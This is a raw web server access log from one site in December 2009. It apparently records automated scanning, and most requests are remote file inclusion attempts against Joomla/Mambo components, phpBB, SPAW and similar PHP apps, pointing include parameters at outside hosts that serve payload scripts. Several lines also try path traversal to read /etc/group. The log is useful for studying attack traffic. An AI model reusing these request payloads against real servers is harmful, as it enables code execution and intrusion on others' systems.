89.203.208.203 - - [20/Dec/2009:19:42:02 -0800] "GET /logs/access_091130.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:42:20 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:42:20 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:42:20 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:42:32 -0800] "GET /logs/access_091130.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:42:54 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:42:54 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:42:54 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:43:12 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:43:13 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:43:15 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.81.68.114 - - [20/Dec/2009:19:44:16 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.81.68.114 - - [20/Dec/2009:19:44:16 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.81.68.114 - - [20/Dec/2009:19:44:16 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.6.163.20 - - [20/Dec/2009:19:45:12 -0800] "GET /logs/access.log HTTP/1.1" 200 177920 "-" "Mozilla/8.0" "www.galf.org"
74.81.68.114 - - [20/Dec/2009:19:45:13 -0800] "GET /logs/access_091012.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.81.68.114 - - [20/Dec/2009:19:46:36 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:47:10 -0800] "GET ///////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 1057 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:47:10 -0800] "GET /logs////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 4957 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:47:10 -0800] "GET /logs/access_091109.log%20%20////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:48:01 -0800] "GET ///////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 1057 "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [20/Dec/2009:19:48:01 -0800] "GET /logs////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 4957 "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [20/Dec/2009:19:48:01 -0800] "GET /logs/access.log%20%20////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.80.193.26 - - [20/Dec/2009:19:48:29 -0800] "GET /labia23portugues/index.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; ZangoToolbar 4.8.2)" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:49:45 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:49:45 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:49:45 -0800] "GET /logs/access_090921.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:50:40 -0800] "GET ///////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 1057 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:50:40 -0800] "GET /logs////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 4957 "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:50:40 -0800] "GET /logs/access_091109.log%20%20////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:51:44 -0800] "GET ///////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 1057 "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [20/Dec/2009:19:51:44 -0800] "GET /logs////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 200 4957 "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [20/Dec/2009:19:51:45 -0800] "GET /logs/access.log%20%20////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.97.212.123 - - [20/Dec/2009:19:52:25 -0800] "GET /logs/access_090706.log//include/main.php?config[search_disp]=true&include_dir=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:19:52:25 -0800] "GET /logs/access_090706.log//include/main.php?config[search_disp]=true&include_dir=./../../../../../../../../../../../../../../../../etc/group HTTP/1.0" 404 - "-" "-" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:19:53:07 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:19:53:08 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:19:53:08 -0800] "GET /logs/access_090921.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.81.68.114 - - [20/Dec/2009:19:53:36 -0800] "GET /logs/access_091012.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:19:53:49 -0800] "GET /logs/access_090921.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:19:53:49 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:19:53:54 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.81.68.114 - - [20/Dec/2009:19:55:04 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.81.68.114 - - [20/Dec/2009:19:55:04 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.81.68.114 - - [20/Dec/2009:19:55:04 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.195.37.161 - - [20/Dec/2009:19:55:09 -0800] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:19:55:19 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:19:55:19 -0800] "GET /logs/access_090921.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:19:55:19 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:56:50 -0800] "GET /logs/access_090921.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:57:04 -0800] "GET /logs/access_090928.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:57:15 -0800] "GET /logs/access_090525.log////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:57:32 -0800] "GET /logs/access_091116.log////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [20/Dec/2009:19:58:16 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:59:20 -0800] "GET /logs/access_090525.log////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:59:29 -0800] "GET /logs/access_091116.log////////////?_SERVER[DOCUMENT_ROOT]=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:19:59:38 -0800] "GET /logs/main.php?pagina=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:19:59:39 -0800] "GET /logs/main.php?pagina=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:19:59:39 -0800] "GET /main.php?pagina=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:19:59:39 -0800] "GET /main.php?pagina=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
118.217.5.166 - - [20/Dec/2009:20:00:51 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [20/Dec/2009:20:00:51 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [20/Dec/2009:20:00:51 -0800] "GET /logs/access_090706.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:20:01:42 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:20:01:42 -0800] "GET /logs/access_090706.log//skin/zero_vote/ask_password.php?dir=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:20:01:42 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [20/Dec/2009:20:03:27 -0800] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:03:40 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:03:41 -0800] "GET /logs/access_091123.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:03:44 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:03:49 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:03:49 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:03:49 -0800] "GET /logs/access_091123.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:04:02 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:04:09 -0800] "GET /logs/access_091123.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:04:09 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:04:09 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:04:12 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:04:19 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:04:48 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:04:50 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:05:15 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:05:15 -0800] "GET /logs/access_091123.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:05:16 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:05:24 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [20/Dec/2009:20:05:26 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:05:35 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:05:51 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:20:08:39 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:20:08:39 -0800] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:20:08:39 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://mk.is/is/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:20:08:53 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:20:08:53 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.166.171.183 - - [20/Dec/2009:20:08:53 -0800] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.53.96.178 - - [20/Dec/2009:20:12:46 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/perkosa.pdf??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
74.53.96.178 - - [20/Dec/2009:20:12:47 -0800] "GET /common/db.php?commonpath=http://www.sudsalentocultura.it/mail/perkosa.pdf??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
74.53.96.178 - - [20/Dec/2009:20:12:49 -0800] "GET /logs//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/perkosa.pdf??? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
72.55.179.121 - - [20/Dec/2009:20:13:34 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
72.55.179.121 - - [20/Dec/2009:20:13:34 -0800] "GET /common/db.php?commonpath=http://www.sudsalentocultura.it/mail/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
72.55.179.121 - - [20/Dec/2009:20:13:34 -0800] "GET /logs//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
72.55.179.121 - - [20/Dec/2009:20:13:35 -0800] "GET /common/db.php?commonpath=http://www.sudsalentocultura.it/mail/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
72.55.179.121 - - [20/Dec/2009:20:13:35 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
72.55.179.121 - - [20/Dec/2009:20:13:35 -0800] "GET /logs//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
94.7.26.184 - - [20/Dec/2009:20:14:18 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.co.uk/url?sa=t&source=web&ct=res&cd=1&ved=0CAcQFjAA&url=http%3A%2F%2Fwww.galf.org%2Flogs%2F&rct=j&q=Index+of+%2FLogs&ei=FvYuS66rEYa64QbV0sWqCA&usg=AFQjCNHxPdRWtvkkSW5L74xwOZb_30Yffg" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)" "www.galf.org"
94.7.26.184 - - [20/Dec/2009:20:14:20 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:14:20 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:14:21 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:14:21 -0800] "GET /logs/access_090706.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.7.26.184 - - [20/Dec/2009:20:14:21 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:14:37 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:14:37 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:20:14:37 -0800] "GET /logs/access_090706.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
